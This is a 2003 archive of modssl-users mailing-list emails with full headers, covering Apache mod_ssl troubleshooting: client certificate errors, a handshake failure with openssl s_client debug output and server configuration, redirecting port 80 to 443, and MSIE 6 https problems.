X-Mailer: Mew version 2.1 on Emacs 20.7 / Mule 4.0 (HANANOEN)
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kiyoshi Watanabe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hello,

> How can i show for users some my own error page (for example, "Please insert
> your ID card!")?

Does the modssl have such a custom error message functionality?

Also, How can the server know whether the ID card is inserted or not?
The error message below only shows that the server does not recieve the
client certificate that was expected.
 
> Apache SSL error.log is:
> [Thu Sep 11 12:23:37 2003] [error] OpenSSL: error:140890C7:SSL
> routines:SSL3_GET_CLIENT_CERTIFICATE:peer did not return a certificate
> [Hint: No CAs known to server for verification?]
> [Thu Sep 11 12:23:37 2003] [error] mod_ssl: SSL handshake failed (server
> erki_laptop/laev:443, client 172.100.60.2) (OpenSSL library error follows)

The solution would be to have your application check whether the ID card
is inserted and make sure your certficate there before you send the SSL
message. 

-Kiyoshi
Kiyoshi Watanabe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 24 18:08:31 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7C933A8959; Wed, 24 Sep 2003 18:08:31 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from alpha2.AXP.MDX.AC.UK (alpha2.axp.mdx.ac.uk [158.94.0.14])
	by master.modssl.org (Postfix) with ESMTP id 5495DA8936
	for ; Wed, 24 Sep 2003 18:08:13 +0200 (CEST)
Received: from CONVERSION-DAEMON.cluster.mdx.ac.uk by cluster.mdx.ac.uk
 (PMDF V6.2-X8 #30533) id <01L11TP6WHPC94I42M@cluster.mdx.ac.uk> for
 modssl-users@modssl.org; Wed, 24 Sep 2003 17:08:09 +0100 (BST)
Received: from imhub2.uni.mdx.ac.uk ([10.13.83.22])
 by cluster.mdx.ac.uk (PMDF V6.2-X8 #30533)
 with ESMTP id <01L11TP5U9EW94HSZC@cluster.mdx.ac.uk> for
 modssl-users@modssl.org; Wed, 24 Sep 2003 17:08:07 +0100 (BST)
Received: from CONVERSION-DAEMON.mdx.ac.uk by mdx.ac.uk (PMDF V6.2 #30684)
 id <01L11TLUSU3K9C3D2K@mdx.ac.uk> for modssl-users@modssl.org; Wed,
 24 Sep 2003 17:05:27 +0100 (BST)
Received: from mdx-cpq-temp1.nw.mdx.ac.uk
 (mdx-cpq-temp1.mdx.ac.uk [10.13.75.36]) by mdx.ac.uk (PMDF V6.2 #30684)
 with ESMTP id <01L11TLULT9I9ANI1D@mdx.ac.uk> for modssl-users@modssl.org; Wed,
 24 Sep 2003 17:05:27 +0100 (BST)
Received: from MDX-CPQ-TEMP1/SpoolDir by mdx-cpq-temp1.nw.mdx.ac.uk
 (Mercury 1.48); Wed, 24 Sep 2003 16:58:39 +0000
Received: from SpoolDir by MDX-CPQ-TEMP1 (Mercury 1.48); Wed,
 24 Sep 2003 16:58:14 +0000
Date: Wed, 24 Sep 2003 16:57:43 +0000
From: a.moon@mdx.ac.uk
Subject: Re: SSL error message
To: modssl-users@modssl.org
Message-id: <61D5984721F@mdx-cpq-temp1.nw.mdx.ac.uk>
MIME-version: 1.0
Content-type: TEXT/PLAIN
Content-transfer-encoding: 7BIT
X-Autoreply-From: 
X-Comment: Middlesex University has scanned this message for viruses.
X-Comment: Middlesex University has scanned this message for viruses.
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: a.moon@mdx.ac.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am away until the 1st of October 2003.  
I will get back to you as soon as i can when I return.  
If the matter is urgent and concerns OASIS, MUBSWEB or MUBS Online 
then please contact one of the other members of the OLSU team.


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 24 18:19:47 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A2597A8959; Wed, 24 Sep 2003 18:19:47 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hitpro.hitachi.co.jp (hitpro.hitachi.co.jp [133.145.224.7])
	by master.modssl.org (Postfix) with ESMTP id 50772A8936
	for ; Wed, 24 Sep 2003 18:19:30 +0200 (CEST)
Received: from mc3.mcg.hitachi.co.jp by hitpro.hitachi.co.jp (8.12.9/eHI-hitpro) id h8OGJRYQ009991; Thu, 25 Sep 2003 01:19:27 +0900 (JST)
Received: (from root@localhost)
	by mc3.mcg.hitachi.co.jp (8.11.6+Sun/8.11.6) id h8OGJQP05166
	for ; Thu, 25 Sep 2003 01:19:26 +0900 (JST)
Received: from unknown [192.168.2.1] by mc3.mcg.hitachi.co.jp with SMTP id BAA05165 ; Thu, 25 Sep 2003 01:19:26 +0900
Received: from navsg4.hitachi.co.jp by navsg4.hitachi.co.jp (8.9.3/3.7W-navsg4) id BAA25650; Thu, 25 Sep 2003 01:19:26 +0900 (JST)
Received: from mlsv4.itg.hitachi.co.jp ([158.213.165.103])
 by navsg4.hitachi.co.jp (NAVGW 2.5.2.17) with SMTP id M2003092501192504600
 ; Thu, 25 Sep 2003 01:19:25 +0900
Received: from navgw5.itg.hitachi.co.jp by mlsv4.itg.hitachi.co.jp (8.12.6/8.12.6) id h8OGJPUn014487; Thu, 25 Sep 2003 01:19:25 +0900
Received: from bisdgw.bisd.hitachi.co.jp ([133.144.87.253])
 by navgw5.itg.hitachi.co.jp (SAVSMTP 3.1.1.32) with SMTP id M2003092501190132129
 ; Thu, 25 Sep 2003 01:19:01 +0900
Received: from bisdmail.bisd.hitachi.co.jp
	by bisdgw.bisd.hitachi.co.jp (8.9.3+3.2W/3.7W-bisdgw) with ESMTP id BAA24963;
	Thu, 25 Sep 2003 01:19:25 +0900 (JST)
	(envelope-from kiyoshi@bisd.hitachi.co.jp)
Received: from localhost
	by bisdmail.bisd.hitachi.co.jp (8.11.3/3.7W-bisdmail) with ESMTP id h8OGJO749444;
	Thu, 25 Sep 2003 01:19:24 +0900 (JST)
	(envelope-from kiyoshi@bisd.hitachi.co.jp)
Date: Thu, 25 Sep 2003 01:18:01 +0900 (JST)
Message-Id: <20030925.011801.41669419.kiyoshi@bisd.hitachi.co.jp>
To: modssl-users@modssl.org, openssl@samreisner.com
Cc: kiyoshi@bisd.hitachi.co.jp
Subject: Re: Handshake Failure, but it looks like SSL
From: Kiyoshi Watanabe 
In-Reply-To: 
References: 
X-Mailer: Mew version 2.1 on Emacs 20.7 / Mule 4.0 (HANANOEN)
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kiyoshi Watanabe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

        OnHandshake Failure, but it looks like SSL, 
	Sam  said:

Any help when you add -ssl3 command?

-Kiyoshi
Kiyoshi Watanabe



> Hi all - 
> 
> I'm trying to get modssl working on a RedHat 8.0 box, which is running
> modssl 2.0.40-11.7 and the apache httpd 2.0.40-11.7 (both from RPM).
> 
> There are several NBVH on port 80, and I one VirtualHost block set to port
> 443.
> 
> When I connect, I get the following:
> 
> $ openssl s_client -connect www.mydomain.com:443  -state -debug
> CONNECTED(00000003)
> SSL_connect:before/connect initialization
> write to 08161508 [08161550] (124 bytes => 124 (0x7C))
> 0000 - 80 7a 01 03 01 00 51 00-00 00 20 00 00 16 00 00   .z....Q... .....
> 0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 05 00 00 04   .........f......
> 0020 - 03 00 80 01 00 80 08 00-80 00 00 65 00 00 64 00   ...........e..d.
> 0030 - 00 63 00 00 62 00 00 61-00 00 60 00 00 15 00 00   .c..b..a..`.....
> 0040 - 12 00 00 09 06 00 40 00-00 14 00 00 11 00 00 08   ......@.........
> 0050 - 00 00 06 00 00 03 04 00-80 02 00 80 7f 5f 29 d7   ............._).
> 0060 - eb 10 2c be a7 b8 42 b9-e5 86 7a b7 03 f0 e9 34   ..,...B...z....4
> 0070 - 47 04 1f 94 00 c4 83 c5-0a bb c5 d7               G...........
> SSL_connect:SSLv2/v3 write client hello A
> read from 08161508 [08166AB0] (7 bytes => 0 (0x0))
> 29523:error:140790E5:SSL routines:SSL23_WRITE:ssl handshake
> failure:s23_lib.c:226:
> $ openssl s_client -connect localhost:443  -state -debug
> CONNECTED(00000003)
> SSL_connect:before/connect initialization
> write to 08160670 [08160A40] (124 bytes => 124 (0x7C))
> 0000 - 80 7a 01 03 01 00 51 00-00 00 20 00 00 16 00 00   .z....Q... .....
> 0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 05 00 00 04   .........f......
> 0020 - 03 00 80 01 00 80 08 00-80 00 00 65 00 00 64 00   ...........e..d.
> 0030 - 00 63 00 00 62 00 00 61-00 00 60 00 00 15 00 00   .c..b..a..`.....
> 0040 - 12 00 00 09 06 00 40 00-00 14 00 00 11 00 00 08   ......@.........
> 0050 - 00 00 06 00 00 03 04 00-80 02 00 80 fc e7 8b 7d   ...............}
> 0060 - 38 97 d2 c0 73 10 26 93-6e 06 61 c2 84 cc dc 6f   8...s.&.n.a....o
> 0070 - fd d7 69 d9 e2 92 c1 55-e4 17 a0 a4               ..i....U....
> SSL_connect:SSLv2/v3 write client hello A
> read from 08160670 [08165FA0] (7 bytes => 0 (0x0))
> 29524:error:140790E5:SSL routines:SSL23_WRITE:ssl handshake
> failure:s23_lib.c:226:
> $ openssl s_client -connect localhost:443  -state -debug
> CONNECTED(00000003)
> SSL_connect:before/connect initialization
> write to 08160670 [08160A40] (124 bytes => 124 (0x7C))
> 0000 - 80 7a 01 03 01 00 51 00-00 00 20 00 00 16 00 00   .z....Q... .....
> 0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 05 00 00 04   .........f......
> 0020 - 03 00 80 01 00 80 08 00-80 00 00 65 00 00 64 00   ...........e..d.
> 0030 - 00 63 00 00 62 00 00 61-00 00 60 00 00 15 00 00   .c..b..a..`.....
> 0040 - 12 00 00 09 06 00 40 00-00 14 00 00 11 00 00 08   ......@.........
> 0050 - 00 00 06 00 00 03 04 00-80 02 00 80 ca 76 f2 09   .............v..
> 0060 - 0a c8 b1 ab 78 f3 c9 b3-a6 8d 34 4e 44 54 14 a5   ....x.....4NDT..
> 0070 - 2f 18 c0 7a 96 e4 21 c5-cd 90 b2 08               /..z..!.....
> SSL_connect:SSLv2/v3 write client hello A
> read from 08160670 [08165FA0] (7 bytes => 0 (0x0))
> 29525:error:140790E5:SSL routines:SSL23_WRITE:ssl handshake
> failure:s23_lib.c:226:
> 
> Note how they're different (slightly) and there's no human-readable text in
> there.  In fact, when I connect to a working https server, I get a similar
> result at the beginning.
> 
> ($ openssl s_client -connect workingdomain.com:443  -state -debug
> CONNECTED(00000003)
> SSL_connect:before/connect initialization
> write to 08161508 [08161550] (124 bytes => 124 (0x7C))
> 0000 - 80 7a 01 03 01 00 51 00-00 00 20 00 00 16 00 00   .z....Q... .....
> 0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 05 00 00 04   .........f......
> 0020 - 03 00 80 01 00 80 08 00-80 00 00 65 00 00 64 00   ...........e..d.
> 0030 - 00 63 00 00 62 00 00 61-00 00 60 00 00 15 00 00   .c..b..a..`.....
> 0040 - 12 00 00 09 06 00 40 00-00 14 00 00 11 00 00 08   ......@.........
> 0050 - 00 00 06 00 00 03 04 00-80 02 00 80 b3 30 11 07   .............0..
> 0060 - d2 7f 14 32 93 4d 4c 53-3c 5d 7d 30 d8 f0 91 a8   ...2.MLS<]}0....
> 0070 - 75 f6 41 b7 0c 69 58 7e-ac 6e 58 11               u.A..iX~.nX.
> SSL_connect:SSLv2/v3 write client hello A
> read from 08161508 [08166AB0] (7 bytes => 7 (0x7))
> 0000 - 16 03 01 00 4a 02                                 ....J.
> 0007 - 
> )
> 
> 
> If I turn OFF the SSLEngine, I get the following:
> 
> $ openssl s_client -connect localhost:443 -state -debug
> CONNECTED(00000003)
> SSL_connect:before/connect initialization
> write to 08160670 [08160A40] (124 bytes => 124 (0x7C))
> 0000 - 80 7a 01 03 01 00 51 00-00 00 20 00 00 16 00 00   .z....Q... .....
> 0010 - 13 00 00 0a 07 00 c0 00-00 66 00 00 05 00 00 04   .........f......
> 0020 - 03 00 80 01 00 80 08 00-80 00 00 65 00 00 64 00   ...........e..d.
> 0030 - 00 63 00 00 62 00 00 61-00 00 60 00 00 15 00 00   .c..b..a..`.....
> 0040 - 12 00 00 09 06 00 40 00-00 14 00 00 11 00 00 08   ......@.........
> 0050 - 00 00 06 00 00 03 04 00-80 02 00 80 1a 3b 1f c0   .............;..
> 0060 - 17 07 46 3e 56 6a cd ea-f4 8f b0 31 0c a1 e6 66   ..F>Vj.....1...f
> 0070 - ae c7 df 2b 80 af ca e1-98 db 3d 9d               ...+......=.
> SSL_connect:SSLv2/v3 write client hello A
> read from 08160670 [08165FA0] (7 bytes => 7 (0x7))
> 0000 - 0a 3c 3f 78 6d 6c                                 . 0007 - 
> SSL_connect:error in SSLv2/v3 read server hello A
> 28895:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown
> protocol:s23_clnt.c:460:
> 
> A different error, and you can see the beginning of the document peeking
> through ( 
> 
> The SSL server's debug output to the error_log [with SSLEngine on] is
> [Sun Sep 14 00:27:53 2003] [info] Connection to child 67 established (server
> www.mydomain.com:443, client xxx.xxx.xxx.xxx)
> [Sun Sep 14 00:27:53 2003] [info] Seeding PRNG with 136 bytes of entropy
> [Sun Sep 14 00:27:53 2003] [debug] ssl_engine_kernel.c(1846): OpenSSL:
> Handshake: start
> [Sun Sep 14 00:27:53 2003] [debug] ssl_engine_kernel.c(1854): OpenSSL: Loop:
> before/accept initialization
> [Sun Sep 14 00:27:53 2003] [debug] ssl_engine_io.c(1027): OpenSSL: read
> 11/11 bytes from BIO#bogus %p[mem: bogus %p !!!@`!!@!!?!!
> [Sun Sep 14 00:27:53 2003] [debug] ssl_engine_io.c(974):
> +-------------------------------------------------------------------------+
> [Sun Sep 14 00:27:53 2003] [debug] ssl_engine_io.c(999): | 0000: 80 7a 01 03
> 01 00 51                             .z....Q          |
> [Sun Sep 14 00:27:53 2003] [debug] ssl_engine_io.c(1003): | 0011 -
> 
> [Sun Sep 14 00:27:53 2003] [debug] ssl_engine_io.c(1005):
> +-------------------------------------------------------------------------+
> [Sun Sep 14 00:27:53 2003] [debug] ssl_engine_io.c(1027): OpenSSL: read
> 113/113 bytes from BIO#bogus %p[mem: bogus %p !!!@`!!@!!?!!
> [Sun Sep 14 00:27:53 2003] [debug] ssl_engine_io.c(974):
> +-------------------------------------------------------------------------+
> [Sun Sep 14 00:27:53 2003] [debug] ssl_engine_io.c(999): | 0000: 00 00 16 00
> 00 13 00 00-0a 07 00 c0 00 00 66 00  ..............f. |
> [Sun Sep 14 00:27:53 2003] [debug] ssl_engine_io.c(999): | 0010: 00 05 00 00
> 04 03 00 80-01 00 80 08 00 80 00 00  ................ |
> [Sun Sep 14 00:27:53 2003] [debug] ssl_engine_io.c(999): | 0020: 65 00 00 64
> 00 00 63 00-00 62 00 00 61 00 00 60  e..d..c..b..a..` |
> [Sun Sep 14 00:27:53 2003] [debug] ssl_engine_io.c(999): | 0030: 00 00 15 00
> 00 12 00 00-09 06 00 40 00 00 14 00  ...........@.... |
> [Sun Sep 14 00:27:53 2003] [debug] ssl_engine_io.c(999): | 0040: 00 11 00 00
> 08 00 00 06-00 00 03 04 00 80 02 00  ................ |
> [Sun Sep 14 00:27:53 2003] [debug] ssl_engine_io.c(999): | 0050: 80 7f 5f 29
> d7 eb 10 2c-be a7 b8 42 b9 e5 86 7a  .._)...,...B...z |
> [Sun Sep 14 00:27:53 2003] [debug] ssl_engine_io.c(999): | 0060: b7 03 f0 e9
> 34 47 04 1f-94 00 c4 83 c5 0a bb c5  ....4G.......... |
> [Sun Sep 14 00:27:53 2003] [debug] ssl_engine_io.c(999): | 0070: d7
> .                |
> [Sun Sep 14 00:27:53 2003] [debug] ssl_engine_io.c(1005):
> +-------------------------------------------------------------------------+
> [Sun Sep 14 00:27:53 2003] [debug] ssl_engine_kernel.c(1854): OpenSSL: Loop:
> SSLv3 read client hello A
> [Sun Sep 14 00:27:53 2003] [debug] ssl_engine_kernel.c(1854): OpenSSL: Loop:
> SSLv3 write server hello A
> [Sun Sep 14 00:27:53 2003] [debug] ssl_engine_kernel.c(1854): OpenSSL: Loop:
> SSLv3 write certificate A
> [Sun Sep 14 00:27:53 2003] [debug] ssl_engine_kernel.c(1248): handing out
> temporary 1024 bit DH key
> 
> 
> 
> Then the child segfaults, the browser complains of a dropped connection.
> 
> 
> httpd.conf has:
> 
> NameVirtualHost xxx.xxx.xxx.xxx
> 
> 
> ServerAdmin email@domain.com
> ServerName www.domain.com
> DocumentRoot /var/www/html
> Include "/etc/httpd/conf/redirects.include.conf"
> 
> 
> 
> ServerName subdomain.domain.com
> DocumentRoot /home/subdomain/
> 
> (repeat a few times with different subdomains)
> 
> ssl.conf, included above that, includes
> 
> 
> LoadModule ssl_module modules/mod_ssl.so
> Listen 443
> AddType application/x-x509-ca-cert .crt
> AddType application/x-pkcs7-crl    .crl
> SSLPassPhraseDialog  builtin
> SSLSessionCache         dbm:/var/cache/mod_ssl/scache
> SSLSessionCacheTimeout  300
> SSLMutex  file:logs/ssl_mutex
> SSLRandomSeed startup builtin
> SSLRandomSeed connect builtin
> 
>     #  #this didn't help
>     DocumentRoot /var/www/html
>     ServerName www.domain.com:443
>     ServerAdmin email@domain.com
>     ErrorLog logs/ssl_error_log
>     TransferLog logs/ssl_access_log
>     LogLevel debug
>     #SSLEngine off 
>     SSLEngine on
>     SSLCipherSuite 
> ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:-SSLv2:+EXP:+eNULL
>     SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt
>     SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key
>     
>         SSLOptions +StdEnvVars
>         
>     
>         SSLOptions +StdEnvVars
>     
>     
>         SSLOptions +StdEnvVars +OptRenegotiate
>     
>     SetEnvIf User-Agent ".*MSIE.*" \
>          nokeepalive ssl-unclean-shutdown \
>          downgrade-1.0 force-response-1.0
>     CustomLog logs/ssl_request_log \
>           "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
>      
> 
> 
> 
> So the big question is, does this ring a bell with anyone?  Seen something
> like this before?  Any suggestions?  Am I missing something? I've been
> around in circles on this one, I'm afraid.
> 
> Thanks in advance
> 
> Sam
> 
> ---
> Humans do it better
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 24 18:21:56 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D3A6AA8974; Wed, 24 Sep 2003 18:21:56 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hitpro.hitachi.co.jp (hitpro.hitachi.co.jp [133.145.224.7])
	by master.modssl.org (Postfix) with ESMTP id 3D411A8936
	for ; Wed, 24 Sep 2003 18:21:55 +0200 (CEST)
Received: from mc4.mcg.hitachi.co.jp by hitpro.hitachi.co.jp (8.12.9/eHI-hitpro) id h8OGLrYQ010336; Thu, 25 Sep 2003 01:21:53 +0900 (JST)
Received: (from root@localhost)
	by mc4.mcg.hitachi.co.jp (8.11.6+Sun/8.11.6) id h8OGLqk19220
	for ; Thu, 25 Sep 2003 01:21:52 +0900 (JST)
Received: from unknown [192.168.2.1] by mc4.mcg.hitachi.co.jp with SMTP id BAA19219 ; Thu, 25 Sep 2003 01:21:51 +0900
Received: from navsg2.hitachi.co.jp by navsg2.hitachi.co.jp (8.9.3/3.7W-navsg2) id BAA01770; Thu, 25 Sep 2003 01:21:51 +0900 (JST)
Received: from mlsv4.itg.hitachi.co.jp ([158.213.165.103])
 by navsg2.hitachi.co.jp (NAVGW 2.5.2.17) with SMTP id M2003092501215022187
 ; Thu, 25 Sep 2003 01:21:50 +0900
Received: from navgw4.itg.hitachi.co.jp by mlsv4.itg.hitachi.co.jp (8.12.6/8.12.6) id h8OGLoUn014538; Thu, 25 Sep 2003 01:21:50 +0900
Received: from bisdgw.bisd.hitachi.co.jp ([133.144.87.253])
 by navgw4.itg.hitachi.co.jp (SAVSMTP 3.1.1.32) with SMTP id M2003092501215611989
 ; Thu, 25 Sep 2003 01:21:56 +0900
Received: from bisdmail.bisd.hitachi.co.jp
	by bisdgw.bisd.hitachi.co.jp (8.9.3+3.2W/3.7W-bisdgw) with ESMTP id BAA25053;
	Thu, 25 Sep 2003 01:21:50 +0900 (JST)
	(envelope-from kiyoshi@bisd.hitachi.co.jp)
Received: from localhost
	by bisdmail.bisd.hitachi.co.jp (8.11.3/3.7W-bisdmail) with ESMTP id h8OGLo749543;
	Thu, 25 Sep 2003 01:21:50 +0900 (JST)
	(envelope-from kiyoshi@bisd.hitachi.co.jp)
Date: Thu, 25 Sep 2003 01:20:26 +0900 (JST)
Message-Id: <20030925.012026.71124329.kiyoshi@bisd.hitachi.co.jp>
To: modssl-users@modssl.org, achana@saysit.com.hk
Cc: kiyoshi@bisd.hitachi.co.jp
Subject: Re: Re-direct in vhost
From: Kiyoshi Watanabe 
In-Reply-To: <004101c380f0$e8e16da0$0200a8c0@com>
References: <004101c380f0$e8e16da0$0200a8c0@com>
X-Mailer: Mew version 2.1 on Emacs 20.7 / Mule 4.0 (HANANOEN)
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kiyoshi Watanabe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hello Arthur,

I do not understand your question clearly. What concerns in
your mind? 

-Kiyoshi
Kiyoshi Watanabe

> Hi all.
> Currently I've one vhost on Port 443 and while others listen on Port 80.
> I would like to test the scenario of putting *everything* on openSSL ie
> listening on Port 443.
> Do I assume right that all I need is a "redirect" from the Port 80 vhost to
> Port 443 ?
> TIA :-)
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep 24 18:38:13 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 10DDAA8959; Wed, 24 Sep 2003 18:38:13 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id BC495A8936
	for ; Wed, 24 Sep 2003 18:37:47 +0200 (CEST)
Received: by toftum.dk (Postfix, from userid 1001)
	id 99F7B6E4043; Wed, 24 Sep 2003 18:37:40 +0200 (CEST)
Date: Wed, 24 Sep 2003 18:37:40 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Re-direct in vhost
Message-ID: <20030924163740.GC27273@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <004101c380f0$e8e16da0$0200a8c0@com> <20030925.012026.71124329.kiyoshi@bisd.hitachi.co.jp>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20030925.012026.71124329.kiyoshi@bisd.hitachi.co.jp>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> > Currently I've one vhost on Port 443 and while others listen on Port 80.
> > I would like to test the scenario of putting *everything* on openSSL ie
> > listening on Port 443.
> > Do I assume right that all I need is a "redirect" from the Port 80 vhost to
> > Port 443 ?

Yes, that sounds about right. Something like this should do:

Listen 80


ServerName example.com
RedirectPermanent / https://example.com


vh

Mads Toftum
--
Speaking at http://ApacheCon.com/
T03, "Apache 2 mod_ssl tutorial" (3h)
WE03, "Troubleshooting Apache configurations" 
WE11, "Apache mod_rewrite, the Swiss Army Knife of URL manipulation" 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 25 08:18:56 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id DACD7A8966; Thu, 25 Sep 2003 08:18:56 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from exchange.sds.no (exchange.sds.no [139.105.2.11])
	by master.modssl.org (Postfix) with ESMTP id DAA5CA8934
	for ; Thu, 25 Sep 2003 08:18:39 +0200 (CEST)
Received: by exchange.sds.no with Internet Mail Service (5.5.2654.42)
	id ; Thu, 25 Sep 2003 08:18:38 +0200
Message-ID: 
From: Torvald Baade Bringsvor 
To: "'modssl-users@modssl.org'" 
Subject: Https problems with MSIE
Date: Thu, 25 Sep 2003 08:18:37 +0200
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2654.42)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Torvald Baade Bringsvor 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello.

We have a user with MSIE 6.00.2800.1106 who is unable to connect to one of
the sites we are hosting (https://www.lindorffd.com). He is using Windows
2000 SP3.

Have any of you had problems with MSIE 6.0 browsers?

I have seen suggestions to disable SSLv3, but wouldnt that adversely affect
other users?

Any suggestions are welcome.

-Torvald
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Sep 25 09:46:45 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 57EB8A8971; Thu, 25 Sep 2003 09:46:45 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.aeccom.com (www.aeccom.com [213.61.120.228])
	by master.modssl.org (Postfix) with ESMTP id C16FAA8934
	for ; Thu, 25 Sep 2003 09:46:26 +0200 (CEST)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by mail.aeccom.com (Postfix) with ESMTP id 69F1F1BEBA
	for ; Thu, 25 Sep 2003 09:46:21 +0200 (CEST)
Received: from mail2.aeccom.com (gate2.aeccom.com [212.202.101.158])
	by mail.aeccom.com (Postfix) with ESMTP id EB01C1BEB7
	for ; Thu, 25 Sep 2003 09:46:20 +0200 (CEST)
Received: from andes.core.aeccom.com (andes.core.aeccom.com [192.168.2.14])
	by mail2.aeccom.com (Postfix) with ESMTP id A1F825C
	for ; Thu, 25 Sep 2003 09:46:20 +0200 (CEST)
Subject: Re: Https problems with MSIE
From: Sven Geisler 
To: modssl-users@modssl.org
In-Reply-To: 
References: 
Content-Type: text/plain
Organization: AEC/communications GmbH
Message-Id: <1064475980.27354.9.camel@andes.core.aeccom.com>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.2.2 (1.2.2-5) 
Date: 25 Sep 2003 09:46:20 +0200
Content-Transfer-Encoding: 7bit
X-Virus-Scanned-By: AMaViS-ng 0.1.6.4
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sven Geisler 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Torvald,

You can find a tip regarding the MSIE issue at
.

I also discovered that the newest MSIE has more trouble with mod_ssl
than other browsers.
We saw that a MS Proxy Server (or MS ISA Server) with enabled
authentification using NTLM increase the issue.

We use the another way to resolve the MSIE keepalive issue. We have set
up a KeepaliveTimeout of 120 seconds.
The apache server may need more memory resources because there are more
open apache processes to cope with the longer timeout.

Regards,
Sven.


Am Don, 2003-09-25 um 08.18 schrieb Torvald Baade Bringsvor:
> Hello.
> 
> We have a user with MSIE 6.00.2800.1106 who is unable to connect to one of
> the sites we are hosting (https://www.lindorffd.com). He is using Windows
> 2000 SP3.
> 
> Have any of you had problems with MSIE 6.0 browsers?
> 
> I have seen suggestions to disable SSLv3, but wouldnt that adversely affect
> other users?
> 
